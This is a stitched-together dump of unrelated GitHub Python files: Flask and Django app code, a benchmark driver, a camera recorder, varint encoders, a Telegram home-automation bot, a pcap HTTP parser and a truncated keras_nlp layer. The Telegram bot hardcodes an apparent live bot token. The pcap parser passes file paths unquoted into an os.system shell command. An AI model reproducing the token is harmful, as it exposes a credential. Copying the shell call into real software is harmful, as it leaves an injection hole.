render_template(\"contractor.html\",data = json.dumps(data))\n    return \"Invalid access\",401\n\n@app.route('/getBid/<cname>')\n@login_required\ndef getBid(cname):\n    if current_user.access == \"admin\" or current_user.username == cname:\n        data = Database.getBid(cname)\n        if len(data) == 0:\n            return jsonify([])\n        return jsonify(data)\n    return \"Invalid access\",401\n","repo_name":"shashi1996/GTMS","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"9709688571","text":"from __future__ import absolute_import, print_function, division, unicode_literals\n\nimport logging\nfrom enum import Enum\nfrom itertools import chain\nimport time\nfrom itertools import islice\nfrom absl import flags\nfrom typing import Sequence, Iterable, Union, Tuple\n\nfrom benchmarks.driver.utils import UsageError, unique, try_with_default\nfrom benchmarks.driver.server import SalusServer\nfrom benchmarks.driver.server.config import presets\nfrom benchmarks.driver.workload import WTL, Executor, RunConfig, Workload\nfrom benchmarks.exps import run_seq, RunFn, maybe_forced_preset\n\n\nFLAGS = flags.FLAGS\nTBatchSize = Union[str, int]\nlogger = logging.getLogger(__name__)\n\nflags.DEFINE_integer('concurrent_jobs', 2, 'Maximum concurrent running jobs', lower_bound=1)\nflags.DEFINE_integer('total_num', 0, 'Only run this number of workloads. 
If 0, means no limit', lower_bound=0)\nflags.DEFINE_string('select_wl', '', 'Select only to run workloads from the list of canonical names given')\n\n\nclass Cases(Enum):\n Shortest = ('jct', False)\n Longest = ('jct', True)\n Smallest = ('persistmem', False)\n Largest = ('persistmem', True)\n\n\ndef gen_workload_list(selection):\n # type: (str) -> Iterable[Tuple[WTL, RunConfig]]\n \"\"\"Select workloads based on commandline\"\"\"\n if not selection:\n blacklist = ['speech', 'seq2seq', 'mnistlg', 'mnistsf', 'mnistcv']\n names = (\n (v, bs)\n for k, v in WTL.known_workloads.items()\n for bs in v.available_batch_sizes()\n if k not in blacklist\n )\n else:\n names = []\n for cname in unique((cname for cname in selection.split(',')), stable=True):\n if '_' not in cname:\n raise UsageError(f\"Not a canonical name: {cname}\")\n name, bs = cname.split('_', 1)\n bs = try_with_default(int, bs, ValueError)(bs)\n names.append((WTL.from_name(name), bs))\n\n # Find all available batch_num with JCT and mem data\n return (\n (wtl, RunConfig(bs, bn, None))\n for wtl, bs in names\n for bn in wtl.available_batch_nums(bs)\n )\n\n\ndef main(argv):\n # type: (Sequence[str]) -> None\n scfg = maybe_forced_preset(presets.MostEfficient)\n scfg.scheduler = 'pack'\n\n cases = (Cases[c] for c in argv) if argv else Cases\n templates = list(gen_workload_list(FLAGS.select_wl))\n if FLAGS.total_num > 0:\n templates = templates[:FLAGS.total_num]\n\n logger.info(\"Selected the following list of workloads\")\n for wtl, rcfg in templates:\n logger.info(f\" {wtl.canonical_name(rcfg)} of {rcfg.batch_num} iters\")\n\n # Check if workloads have the info we need\n for wtl, rcfg in templates:\n for field in ['jct', 'persistmem']:\n if wtl.geometry(rcfg, Executor.Salus)[field] is None:\n raise ValueError(f'Missing {field} data for workload {wtl.canonical_name(rcfg)} of {rcfg.batch_num} iters, available geometries: {wtl._geometries}')\n\n for case in cases:\n logdir = FLAGS.save_dir / case.name\n\n # create workload instances\n workloads = (wtl._create_from_rcfg(rcfg, Executor.Salus) for wtl, rcfg in templates)\n # sort workload according to case\n key, desc = case.value\n workloads = sorted(workloads, key=lambda w: w.geometry[key], reverse=desc)\n\n def limit_concurrent(wls):\n # type: (Iterable[Workload]) -> None\n \"\"\"Wait for something to finish\"\"\"\n gone, alive = SalusServer.wait_workloads(wls, timeout=0)\n while len(alive) >= FLAGS.concurrent_jobs:\n gone, alive = SalusServer.wait_workloads(wls, timeout=0)\n time.sleep(.25)\n\n actions = chain(*(\n [w, RunFn(limit_concurrent)]\n for w in workloads\n ))\n\n run_seq(scfg.copy(output_dir=logdir), *actions)\n","repo_name":"SymbioticLab/Salus","sub_path":"benchmarks/exps/old/bigrun.py","file_name":"bigrun.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"67"} +{"seq_id":"38677798228","text":"# django-modeladmin-reorder\nADMIN_REORDER = (\n # 세미나\n {\n \"app\": \"seminars\",\n \"label\": \"세미나\",\n \"models\": (\n {\"model\": \"seminars.Seminar\", \"label\": \"세미나\"},\n {\"model\": \"seminars.Track\", \"label\": \"트랙\"},\n {\"model\": \"seminars.Session\", \"label\": \"세션\"},\n ),\n },\n {\n \"app\": \"seminars\",\n \"label\": \"세미나 추가정보\",\n \"models\": (\n {\"model\": \"seminars.Speaker\", \"label\": \"발표자\"},\n {\"model\": \"seminars.SpeakerLinkType\", \"label\": \"발표자 링크 유형\"},\n {\"model\": \"seminars.SpeakerLink\", \"label\": \"발표자 링크\"},\n {\"model\": \"seminars.SessionVideo\", 
\"label\": \"세션 영상\"},\n {\"model\": \"seminars.SessionLink\", \"label\": \"세션 링크\"},\n {\"model\": \"seminars.SessionFile\", \"label\": \"세션 첨부파일\"},\n ),\n },\n # 스폰서\n {\n \"app\": \"sponsors\",\n \"label\": \"스폰서\",\n \"models\": (\n {\"model\": \"sponsors.SponsorTier\", \"label\": \"스폰서 등급\"},\n {\"model\": \"sponsors.Sponsor\", \"label\": \"스폰서\"},\n ),\n },\n # 인증\n {\n \"app\": \"members\",\n \"label\": \"인증 및 권한\",\n \"models\": (\n {\"model\": \"members.User\", \"label\": \"사용자\"},\n {\"model\": \"auth.Group\", \"label\": \"그룹\"},\n {\"model\": \"authtoken.Token\", \"label\": \"인증토큰\"},\n {\"model\": \"rest_framework_api_key.APIKey\", \"label\": \"APIKey\"},\n ),\n },\n)\n","repo_name":"LeeHanYeong/let-us-Go","sub_path":"app/config/settings/base/admin_reorder.py","file_name":"admin_reorder.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"5142523116","text":"import threading\r\nimport os\r\nimport urllib.request\r\nimport urllib\r\nimport cv2\r\nimport numpy as np\r\nimport time\r\nimport sys\r\nfrom datetime import datetime\r\n\r\n\r\nfolder=os.getcwd()\r\nprint(folder)\r\nsaveTo=\"H:\\\\recording\"\r\nfile='cameraaddress.txt'\r\nIPADDR=[]\r\n# print(\"Default\",IPADDR)\r\n\r\nwith open(os.path.join(folder,file),'r') as f:\r\n for line in f.read().split(\"\\n\"):\r\n print(line, sep='\\n')\r\n \r\n\r\nprint(\"these are addresses stored \",\"if wanna reset then press 1, else 0\")\r\nre=int(input())\r\n\r\nif re==1:\r\n while(True):\r\n print(\"enter IP address:port\")\r\n ip=input()\r\n temp='http://'+ip+'/video'\r\n IPADDR.append(temp)\r\n print (\"Add more? 1 Yes 0 No\")\r\n if(int(input())==0):\r\n break\r\n else:\r\n continue\r\n\r\nif re==1:\r\n with open(os.path.join(folder,file),'w') as f:\r\n for addr in IPADDR:\r\n f.write(addr+\"\\n\")\r\nelse:\r\n IPADDR=[]\r\n with open(os.path.join(folder,file),'r') as f:\r\n for line in f.read().split(\"\\n\"):\r\n IPADDR.append(line)\r\n\r\nprint(IPADDR)\r\n\r\nclass MultiThreading(threading.Thread):\r\n def __init__(self,threadID,cameraID,IPaddress,IsRun):\r\n threading.Thread.__init__(self)\r\n self.threadID=threadID\r\n self.cameraID=cameraID\r\n self.IPaddress=IPaddress\r\n self.IsRun=True\r\n # self.currDate=str(datetime.now().strftime(\"%d-%m-%Y-%H-%M-%S\"))\r\n # self.rec=cv2.VideoWriter(os.path.join(saveTo,'output-'+self.cameraID+\"-\"+self.currDate+'.avi'),cv2.VideoWriter_fourcc('M','J','P','G'),30,(640,480))\r\n\r\n def run(self):\r\n print(\"starting camera \", self.cameraID)\r\n # start the camera and process\r\n if self.IsRun:\r\n # openCamera(self.cameraID,self.IPaddress,self.IsRun,self.rec)\r\n openCamera(self.cameraID,self.IPaddress,self.IsRun)\r\n else:\r\n return 0 #self.IsRun # thread stopped\r\n\r\n\r\n# def record(cameraID,frame,IPaddress):\r\n\r\n# #define recording save:\r\n\r\n# out.write(frame)\r\n \r\n\r\n\r\n# define camera open\r\n# def openCamera(cameraID,IPaddress,IsRun,rec):\r\ndef openCamera(cameraID,IPaddress,IsRun):\r\n print(cameraID)\r\n try:\r\n cam=cv2.VideoCapture(IPaddress)\r\n if cam is None or not cam.isOpened() :\r\n print(\"ERROR HANDLED BY IF IN TRY\")\r\n print(\"camera \",cameraID,\" is unavailable\", \" at the IP:port \",IPaddress)\r\n print(\"retrying from due to TCP error \")\r\n for i in range(0,2):\r\n time.sleep(i) # seconds\r\n print(\"retrying in \",i ,\"seconds for the camera ID \", cameraID, \"IP:port \" ,IPaddress )\r\n openCamera(cameraID,IPaddress,IsRun)\r\n # 
openCamera(cameraID,IPaddress,IsRun,rec)\r\n\r\n else:\r\n currDate=str(datetime.now().strftime(\"%d-%m-%Y-%H-%M-%S\"))\r\n rec=cv2.VideoWriter(os.path.join(saveTo,'output-'+cameraID+\"-\"+currDate+'.avi'),cv2.VideoWriter_fourcc('M','J','P','G'),20,(640,480)) #20 is normal speed 30=1.5x 60=3x\r\n print(\"FEED STARTED \",cameraID,\"IP:port \",IPaddress)\r\n while True and IsRun :\r\n _,frame=cam.read()\r\n rec.write(frame)\r\n cv2.imshow(cameraID,frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n IsRun=False\r\n print(\"forced destruction of IP:port@ \",IPaddress,\" camera ID \", cameraID)\r\n cam.release()\r\n rec.release()\r\n cv2.destroyAllWindows()\r\n exit(1)\r\n break\r\n \r\n except :\r\n if not IsRun:\r\n return 0\r\n else:\r\n try:\r\n rec.release()\r\n cam.release()\r\n cv2.destroyAllWindows()\r\n except :\r\n pass\r\n\r\n print(\"ERROR HANDLED BY EXCEPTION\")\r\n print(\"failure in connection to the IP:port\", cameraID, IPaddress)\r\n for i in range(0,2):\r\n time.sleep(i) # seconds\r\n print(\"retrying in \",i ,\"seconds for the camera ID \", cameraID, \"IP:port \" ,IPaddress )\r\n print(\"trying to connect\")\r\n # openCamera(cameraID,IPaddress,IsRun,rec)\r\n openCamera(cameraID,IPaddress,IsRun)\r\n\r\nnIP=len(IPADDR)\r\nthreads=[]\r\nfor i in range(0,nIP):\r\n if IPADDR[i]!='':\r\n thread=MultiThreading(str(i),str(i),IPADDR[i],True)\r\n threads.append(thread)\r\n\r\n else:\r\n continue\r\n\r\nfor start_thread in threads:\r\n start_thread.start()\r\n \r\n\r\n# thread1=MultiThreading('1','1','http://192.168.1.2:8080/video')\r\n# thread1.start()\r\n# thread2=MultiThreading('2','2','http://192.168.1.7:8081/video')\r\n# thread2.start()\r\n# while True:\r\n\r\n\r\n# _,frame=cam.read()\r\n# # Finally decode the array to OpenCV usable format ;) \r\n# #img = cv2.imdecode(imgNp,-1)\t\r\n# \t# put the image on screen\r\n# cv2.imshow('IPWebcam',frame)\r\n\r\n# if cv2.waitKey(1) & 0xFF == ord('q'):\r\n# break\r\n# cam.release()\r\n# cv2.destroyAllWindows()\r\n","repo_name":"whysoseriousoni/http-PY-video-recoreder","sub_path":"ip video feed from url 27-8.py","file_name":"ip video feed from url 27-8.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71386781015","text":"def uint2bytes(n):\n result = []\n while n > 127:\n n, r = divmod(n, 128)\n result.append(r + 128)\n return bytearray(result + [n])\n\ndef bytes2uint(bts):\n num = 0\n for byte in reversed(bts):\n num = num * 128 + (byte & 127)\n return num\n\ndef int2bytes(n):\n result = []\n while abs(2*n + 1) > 128:\n n, r = divmod(n, 128)\n result.append(r + 128)\n return bytearray(result + [n % 128])\n\ndef bytes2int(bts):\n num = 0\n for byte in reversed(bts):\n num = num * 128 + (byte & 127)\n return num - 2**(7 * len(bts)) if bts[-1] & 64 else num\n\nassert list(uint2bytes(624485)) == [0xE5, 0x8E, 0x26]\nassert bytes2uint([0xCD, 0xE1, 0xB2, 0x02]) == 5025997\nassert list(int2bytes(-123456)) == [0xC0, 0xBB, 0x78]\nassert bytes2int([0x9B, 0xF1, 0x59]) == -624485\n","repo_name":"hvox/data-serialization-formats","sub_path":"variable_length_code/leb128.py","file_name":"leb128.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10563499878","text":"from app.api_1_0 import api\nfrom flask import request,jsonify\nfrom app.model import productModel\nfrom app.validation import btProduct,isInt\n'''\n获取近期product\n@url 
/product/recent?count=1\nhttp GET\n'''\n@api.route('/product/recent',methods=['GET'])\ndef getRecentProduct():\n    count=request.values.get('count')\n    if count is None:\n        count=15\n    btProduct('/product/recent',count)\n    recentProducts=productModel.getRecentProducts(count)\n    return jsonify(recentProducts)\n'''\n获取分类下的product\n@url /product/by_category?id=2\nhttp GET\n'''\n@api.route('/product/by_category',methods=['GET'])\ndef getAllInCategory():\n    id=request.values.get('id')\n    isInt('/product/by_category',id)\n    allInCategory=productModel.getProductsByCategoryID(id)\n    return jsonify(allInCategory)\n'''\n获取某个product的详细信息\n@url /product/1\nhttp GET\n'''\n@api.route('/product/<int:id>',methods=['GET'])\ndef getOne(id):\n    isInt('/product/<int:id>',id)\n    productDetail=productModel.getProductDetail(id)\n    return jsonify(productDetail)\n\n\n","repo_name":"seven-share/flaskPractice","sub_path":"flaskShop/moocShop/app/api_1_0/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
{"seq_id":"21965379538","text":"# -*- coding: utf-8 -*-\n\nimport serial\nimport telepot \nfrom telepot.loop import MessageLoop \nfrom time import sleep\nimport asyncio\n\nimport camara_functions as camara\nimport weather\nimport leds_functions as light\n\n# Configuracion para serializar el arduino\narduino = serial.Serial('/dev/ttyACM0', 9600)\narduino.flush()\n\n# Función asincrona que recibirá si se toco el timbre o si el detector de gas manda una señal\nasync def arduinoSerial():\n    while True:\n        if arduino.in_waiting > 0:\n            line = str(arduino.readline()) #.decode('utf-8').rstrip()\n            timbre = line[3]\n            gas = line[5]\n            print(line)\n            #print(timbre)\n            #print(gas)\n            if timbre == '1': bot.sendMessage(1597500632, '[ALERTA]: Han tocado el timbre')\n            if gas == '1': bot.sendMessage(1597500632, '[ALERTA]: Fuga de gas!!!')\n\n# Comunicación con el bot\ndef handle(msg):\n\n    # Obtenemos informacion del mensaje\n    chat_id = msg['chat']['id'] \n    command = msg['text'] \n    print(chat_id) \n    print ('Received:')\n    print(command)\n    \n    # Comparamos el mensaje recibido y ejecutamos cierta funcion segun sea el caso\n    if command == '/hi':\n        bot.sendMessage(chat_id, \"Hola nena UwU <3\")\n\n    elif command == '/time':\n        time = weather.time()\n        bot.sendMessage(chat_id, time)\n\n    elif command == '/date':\n        date = weather.date()\n        bot.sendMessage(chat_id, date)\n\n    elif command.startswith('/turn_on '):\n        try:\n            led = int(command[command.index(' ') + 1:])\n            output = light.turn_on(led)\n            output()\n            bot.sendMessage(chat_id, 'Led {} encendido'.format(str(led)))\n        except:\n            bot.sendMessage(chat_id, 'Error: Intentelo más tarde')\n    \n    elif command.startswith('/turn_off '):\n        try:\n            led = int(command[command.index(' ') + 1:])\n            output = light.turn_off(led)\n            output()\n            bot.sendMessage(chat_id, 'Led {} apagado'.format(str(led)))\n        except:\n            bot.sendMessage(chat_id, 'Error: Intentelo más tarde')\n\n    elif command.startswith('/weather '):\n        try:\n            info = weather.get_info(command)\n            bot.sendMessage(chat_id, str(info))\n        except:\n            bot.sendMessage(chat_id, str('Error, intentelo más tarde :c'))\n    \n    elif command == '/state_list':\n        leds_states = light.leds_state_list()\n        bot.sendMessage(chat_id, leds_states)\n\n    elif command == '/photo':\n        try:\n            bot.sendMessage(chat_id, str(\"Taking photo ...\"))\n            camara.take_foto()\n            bot.sendMessage(chat_id, str(\"Ready!!!\"))\n            bot.sendPhoto(chat_id, open('/home/pi/Proyectos/projectTelegramBot_v2/media/captura_rasp.jpg', 'rb'))\n            
except:\n bot.sendMessage(chat_id, str('Error, intentelo más tarde :c'))\n \n elif command == '/video':\n try:\n bot.sendMessage(chat_id, str(\"recording ...\"))\n camara.record_video()\n bot.sendMessage(chat_id, str(\"Ready!!!\"))\n bot.sendVideo(chat_id, open('/home/pi/Proyectos/projectTelegramBot_v2/media/video_rasp.h264', 'rb'))\n except:\n bot.sendMessage(chat_id, str('Error, intentelo más tarde :c'))\n\n# Insertamos el token de telegram debajo\nbot = telepot.Bot('1973126486:AAFjyJsMHAM8LhcXUTexWUKREtbZJnu6Noc')\nprint (bot.getMe())\n\n# Empieza a escuchar al bot de telegram y cualquier mensaje que reciba, la funcion handle será llamada\nMessageLoop(bot, handle).run_as_thread()\nprint ('Listening....')\n\n# Ejecutamos el programa para leer los datos del arduino\nasyncio.run(arduinoSerial())\n\n# Mantenemos el programa corriendo\nwhile 1:\n sleep(10)\n","repo_name":"PakoMtzR/telegram_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39354809357","text":"from enum import Enum\nimport xml.etree.ElementTree as ET\nfrom . import prefix_for_teamtype, Skills\nfrom .player import create_player\n\n\nMAX_PLAYER_COUNT = 16\n\n\nclass CoachType(Enum):\n LOCAL = 0\n AI = 1\n REMOTE = 2\n\n\ndef create_team(db, team_type):\n table_prefix = prefix_for_teamtype(team_type)\n cur = db.cursor()\n cur.execute('SELECT Match_strSave FROM SavedGameInfo')\n xml_str = cur.fetchone()[0]\n match_xml = ET.fromstring(xml_str)\n coach_type = CoachType(int(match_xml.find(f'.//{table_prefix}/ePlayerType').text))\n cur.execute('SELECT team.strName, race.DATA_CONSTANT, iValue, iPopularity, iRerolls, bApothecary '\n f'FROM {table_prefix}_Team_Listing team INNER JOIN {table_prefix}_Races race ON idRaces = race.ID')\n team = Team(*cur.fetchone(), team_type, coach_type)\n player_numbers = match_xml.findall(f'.//{table_prefix}/vecPlayersInit/*/Number')\n player_number_map = {}\n for i, num in enumerate(player_numbers):\n player_number_map[int(num.text)] = i\n\n player_rows = cur.execute('SELECT ID, iNumber, strName, '\n 'Characteristics_fMovementAllowance, Characteristics_fStrength, '\n 'Characteristics_fAgility, Characteristics_fArmourValue, '\n 'idPlayer_Levels, iExperience, iValue '\n f'FROM {table_prefix}_Player_Listing')\n player_cache = {}\n for row in player_rows:\n player = create_player(team, *row[1:])\n player_cache[row[0]] = player\n team.add_player(player_number_map[player.number], player)\n\n type_skills = cur.execute('SELECT player.ID, idSkill_Listing, description '\n f'FROM {table_prefix}_Player_Listing player '\n f'INNER JOIN {table_prefix}_Player_Type_Skills type_skills '\n 'ON player.idPlayer_Types = type_skills.idPlayer_Types')\n\n for skill_row in type_skills:\n player = player_cache[skill_row[0]]\n try:\n player.skills.append(Skills(skill_row[1]))\n except ValueError as ex:\n raise ValueError(f\"Unidentified skill {skill_row[1]} ({skill_row[2]}) for {team.name} player \"\n f\"#{player.number} {player.name}\") from ex\n\n learned_skills = cur.execute(f'SELECT idPlayer_Listing, idSkill_Listing FROM {table_prefix}_Player_Skills')\n\n for skill_row in learned_skills:\n player = player_cache[skill_row[0]]\n try:\n player.skills.append(Skills(skill_row[1]))\n except ValueError as ex:\n raise ValueError(f\"Unidentified learned skill {skill_row[1]} for {team.name} player \"\n f\"#{player.number} {player.name}\") from ex\n\n cur.close()\n return team\n\n\nclass 
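A note on the telegram_bot record that ends above: asyncio.run(arduinoSerial()) never returns, because the coroutine loops forever, so the trailing keep-alive loop (while 1: sleep(10)) is unreachable. A minimal sketch, assuming the record's arduinoSerial coroutine, of moving the reader onto a daemon thread so the main thread actually reaches the keep-alive loop:

import asyncio
import threading

# Sketch only (not from the repo): run the blocking serial-reader loop on a
# background daemon thread; asyncio.run creates a fresh event loop there.
reader = threading.Thread(target=lambda: asyncio.run(arduinoSerial()), daemon=True)
reader.start()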
Team:\n def __init__(self, name, race, team_value, fame, rerolls, apothecary, team_type, coach_type=CoachType.AI):\n self.name = name\n self.race = race\n self.team_value = team_value\n self.fame = fame\n self.rerolls = rerolls\n self.apothecaries = apothecary\n self.team_type = team_type\n self._players = [None] * MAX_PLAYER_COUNT\n self._player_number_map = {}\n self.coach_type = coach_type\n\n def add_player(self, idx, player):\n self._player_number_map[player.number] = idx\n self._players[idx] = player\n player.team = self\n\n def get_players(self):\n return filter(None, self._players)\n\n def get_player(self, idx):\n return self._players[idx]\n\n def get_player_by_number(self, number):\n idx = self._player_number_map[int(number)]\n return self._players[idx]\n\n def get_player_number(self, idx):\n return self._players[idx].number\n","repo_name":"IBBoard/bbreplay","sub_path":"bbreplay/teams.py","file_name":"teams.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"19502703438","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport magic\nimport moment\n# Local import\nfrom parser import parser\nfrom ..utils import utils\nfrom ..observable import observable\n\n\"\"\"http parser\"\"\"\n\nclass http(parser):\n \"\"\"\n http parser\n \"\"\"\n\n explode_result = None\n\n def explode(self):\n \"\"\"\n Execute chaosreader and parse generate files to extract observables\n \"\"\"\n\n # Execute chaosreader\n os.system('{crbin} -v \"{pcap}\" -D \"{dest}\" > {output}'.format(\n dest=self.storage+'/'+os.path.basename(self.pcap_filename)+\".sessions\", pcap=self.pcap_filename, crbin=os.path.realpath(self.config['chaosreader']), output=self.storage+'/chaosreader.log'\n ))\n\n session_id = []\n pcapsessiondir = self.storage+'/' + os.path.basename(self.pcap_filename)+\".sessions/\"\n\n # Retrieve all session files\n if(os.path.exists(pcapsessiondir)):\n files = [f for f in os.listdir(pcapsessiondir) if os.path.isfile(\n os.path.join(pcapsessiondir, f))]\n for file in files:\n if str(file).startswith('session_'):\n matches = re.search(r\"session_(\\d+)\\.info\", file)\n if matches:\n session_id += [matches.group(1)]\n session_id = sorted(session_id)\n\n # For each session file\n sessions = []\n for sessid in session_id:\n if True:\n\n # Get the main information\n\n info = utils.file_get_contents(\n pcapsessiondir+\"session_\"+sessid+\".info\")\n info = (info.split('\\n'))\n\n data = []\n data += [('Session', sessid)]\n for line in info[2:-1]:\n linesplited = line.split(': ')\n key = linesplited[0].strip().replace(' ', '_')\n value = linesplited[1].strip()\n data += [(key, value)]\n cursess = dict(data)\n\n\n # If session is http : analyze the session\n if cursess['Dest_service'] == 'http':\n\n # Retrieve the http requests and responses\n\n raw = utils.file_get_contents(pcapsessiondir+\"session_\"+sessid+\".http.html\")\n raw = raw.replace('', '')\n raw = raw.replace('', '')\n raw = raw.replace('', '')\n raw = raw.replace('>', '')\n raw = raw.replace('', '')\n raw = raw.replace('\\n', '')\n raw = raw.replace('\\r', '\\n')\n\n # Isolate requests and reponses\n matches = re.finditer(r\"(^([A-z0-9\\-]+)(\\:\\s)(.*))|(([A-Z]+)\\s(\\S+)\\s((HTTP)\\/\\d\\.\\d))|(((HTTP)\\/\\d\\.\\d)\\s(\\d+)\\s(.+))\", raw, re.MULTILINE)\n\n RequestE = {}\n current = \"Request\"\n id = 0\n # Associate request with response\n for matchNum, match in enumerate(matches):\n matchNum = matchNum + 
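For the teams.py record that ends above, a small illustration of Team's two-level lookup: players live in roster slots, and _player_number_map translates shirt numbers to slots. The team values and the _P stand-in player class are hypothetical; add_player only needs a .number attribute and a writable .team.

class _P:  # hypothetical stand-in; only .number and .team are used here
    def __init__(self, number):
        self.number = number
        self.team = None

team = Team("Reikland Reavers", "Human", 1000, 2, 3, True, team_type=0)
team.add_player(0, _P(7))  # roster slot 0 holds shirt number 7
assert team.get_player_by_number(7) is team.get_player(0)
assert team.get_player_number(0) == 7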
1\n\n if(match.group(9) == 'HTTP'):\n # Request\n id += 1\n current = \"Request\"\n RequestE['{}-{}'.format(sessid, id)] = {\n \"Request\": {\n \"Method\": match.group(6),\n \"Url\": match.group(7),\n \"Proto\": match.group(8),\n \"Headers\": {}\n },\n \"Response\": {}\n }\n elif(match.group(12) == 'HTTP' and id != 0):\n current = \"Response\"\n RequestE['{}-{}'.format(sessid, id)]['Response'] = {\n \"Status\": {\n \"Code\": match.group(13),\n \"Message\": match.group(14),\n },\n \"Proto\": match.group(11),\n \"Headers\": {}\n }\n else:\n if(match.group(2) != '' and id != 0):\n RequestE['{}-{}'.format(\n sessid, id)][current]['Headers'][match.group(2)] = match.group(4)\n\n cursess['Http'] = RequestE\n\n\n # For each Request-Response, retrieve files\n for sessionHttp in cursess['Http']:\n cursessHttp = cursess['Http'][sessionHttp]\n cursess['Http'][sessionHttp]['Dropped_files'] = []\n file_id = int(sessionHttp.split('-')[1])\n if(file_id < 10):\n file_id = '0{}'.format(file_id)\n file_dname = 'session_{}.part_{}'.format(\n sessid, file_id)\n \n # For each dropped files\n for findF in files:\n if(findF.startswith(file_dname)):\n \n # Find the filename\n filename = None\n\n # Filename in headers\n if cursess['Http'][sessionHttp]['Response'].get('Headers') and cursess['Http'][sessionHttp]['Response']['Headers'].get('Content-Disposition'):\n contentDisposition = cursess['Http'][sessionHttp]['Response']['Headers'].get(\n 'Content-Disposition').split('filename=')\n filename = contentDisposition[1].strip()\n # Filename in url\n else:\n matches = re.search(r\"(([A-z0-9\\-\\_\\%]+\\.\\S*?))(\\?\\S*)?$\", cursess['Http'][sessionHttp]['Request']['Url'])\n if matches:\n filename = matches.group(2)\n \n # Save file info\n findFpath = pcapsessiondir+findF\n cursess['Http'][sessionHttp]['Dropped_files'] += [{\n \"path\": findFpath,\n \"mime\": magic.from_file(findFpath, mime=True),\n \"filename\": filename,\n \"hash\": {\n \"sha256\": utils.file_hash('sha256', findFpath),\n \"md5\": utils.file_hash('md5', findFpath)\n }\n }]\n\n sessions += [cursess]\n\n # Construct the final collections\n outraw = {}\n for session in sessions:\n if(session.get('Http') and session.get('Http') != None):\n for idpart in (session.get('Http')):\n\n outraw[session['Session']] = {}\n outraw[session['Session']]['fqdn'] = {}\n \n part = session['Http'].get(idpart)\n\n fqdn_l = part['Request']['Headers']['Host'].split('.')\n fqdn = '{}.{}'.format(fqdn_l[-2], fqdn_l[-1])\n\n if(fqdn not in outraw):\n outraw[session['Session']]['fqdn'][fqdn] = {'domain': {}, 'ip': {}}\n\n outraw[session['Session']]['fqdn'][fqdn]['domain'][str(part['Request']['Headers']['Host'])] = {}\n\n outraw[session['Session']]['ip'] = list(set([\n session.get('Source_addr'),\n session.get('Dest_addr')\n ]))\n\n outraw[session['Session']]['date'] = list(set([\n session.get('First_time'),\n session.get('Last_time')\n ]))\n\n url = part['Request']['Url']\n if not url.startswith('http://'):\n url = 'http://'+part['Request']['Headers']['Host']+url\n\n outraw[session['Session']]['fqdn'][fqdn]['domain'][str(\n part['Request']['Headers']['Host'])][url] = {}\n\n for dfile in part['Dropped_files']:\n outraw[session['Session']]['fqdn'][fqdn]['domain'][str(part['Request']['Headers']['Host'])][url][dfile['path']] = {\n \"hash\": dfile['hash'],\n \"filename\": dfile['filename']\n }\n\n self.explode_result = outraw\n\n\n def report(self):\n outraw = self.explode_result\n outfinal0 = []\n for session in outraw:\n outfinal1 = []\n for fqdn in outraw[session]['fqdn']:\n for 
domain in outraw[session]['fqdn'][fqdn]['domain']:\n for url in outraw[session]['fqdn'][fqdn]['domain'][domain]:\n for file in outraw[session]['fqdn'][fqdn]['domain'][domain][url]:\n filechild = outraw[session]['fqdn'][fqdn]['domain'][domain][url][file]\n for hashd in filechild['hash']:\n outfinal1 += [observable(filechild['hash'].get(hashd), 'hash').__dict__]\n if(filechild['filename'] != None):\n outfinal1 += [observable(filechild['filename'], 'filename').__dict__]\n outfinal1 += [observable(file, 'file').__dict__]\n outfinal1 += [observable(url, 'url').__dict__]\n outfinal1 += [observable(domain, 'domain').__dict__]\n for ip in outraw[session]['ip']:\n outfinal1 += [observable(ip, 'ip').__dict__]\n for date in outraw[session]['date']:\n m = moment.date(date, '%a %b %d $H:$M:$S %Y')\n outfinal1 += [observable(m.format('YYYY-MM-DD HH:mm:ss'), 'date').__dict__] \n outfinal1 += [observable(fqdn, 'fqdn').__dict__]\n outfinal0 += [observable(session, 'session', outfinal1).__dict__]\n return outfinal0\n\n\n\n ","repo_name":"Cyberprotect/Ceres-Packet-Exploder","sub_path":"cerespacketexploder/parser/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":10600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5865899079","text":"import random\n\nimport tensorflow as tf\n\nfrom keras_nlp.api_export import keras_nlp_export\nfrom keras_nlp.layers.preprocessing.preprocessing_layer import (\n PreprocessingLayer,\n)\nfrom keras_nlp.utils.tensor_utils import convert_to_ragged_batch\nfrom keras_nlp.utils.tensor_utils import is_int_dtype\nfrom keras_nlp.utils.tensor_utils import is_string_dtype\n\n\n@keras_nlp_export(\"keras_nlp.layers.RandomDeletion\")\nclass RandomDeletion(PreprocessingLayer):\n \"\"\"Augments input by randomly deleting tokens.\n\n This layer comes in handy when you need to generate new data using deletion\n augmentation as described in the paper [EDA: Easy Data Augmentation\n Techniques for Boosting Performance on Text Classification Tasks]\n (https://arxiv.org/pdf/1901.11196.pdf). The layer expects the inputs to be\n pre-split into token level inputs. This allows control over the level of\n augmentation, you can split by character for character level swaps, or by\n word for word level swaps.\n\n Input data should be passed as tensors, `tf.RaggedTensor`s, or lists. For\n batched input, inputs should be a list of lists or a rank two tensor. For\n unbatched inputs, each element should be a list or a rank one tensor.\n\n Args:\n rate: The probability of a token being 